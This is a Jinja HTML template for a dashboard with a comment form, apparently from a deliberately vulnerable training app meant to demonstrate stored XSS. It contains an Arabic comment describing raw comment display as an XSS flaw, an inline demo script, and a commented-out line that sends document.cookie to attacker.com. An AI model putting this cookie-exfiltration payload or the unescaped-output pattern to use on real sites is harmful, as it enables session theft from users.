<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Dashboard | TimeSaver</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='Secure.css') }}">
</head>
<body>
  <div class="dashboard">
    <!-- Sidebar -->
    <aside class="sidebar">
      <img src="{{ url_for('static', filename='profile.svg') }}" class="sidebar-icon" alt="Profile">
      <img src="{{ url_for('static', filename='logout.svg') }}" class="sidebar-icon logout"
      alt="Logout" onclick="location.href='{{ url_for('login_unsafe') }}'">
    </aside>

    <!-- Main Content -->
    <main class="profile-content">
      <div class="profile-header">
        <h2>Welcome, {{ session.username }}</h2>
      </div>

      <h3>Leave a Comment</h3>
      <form action="{{ url_for('add_comment_unsafe') }}" method="POST">
        <textarea name="comment" rows="3" cols="50" required></textarea><br>
        <button type="submit">Post Comment</button>
      </form>

      <h3>Your Comments:</h3>
      <ul>
        {% for cm in comments %}
        <li>{{ cm }}</li>  <!-- عرض خام لتعكس ثغرة XSS -->
        {% endfor %}
      </ul>
      <script>document.body.style.background = 'red'</script>
      <!-- <script>fetch('http://attacker.com?c=' + document.cookie)</script> -->
    </main>
  </div>
</body>
</html>

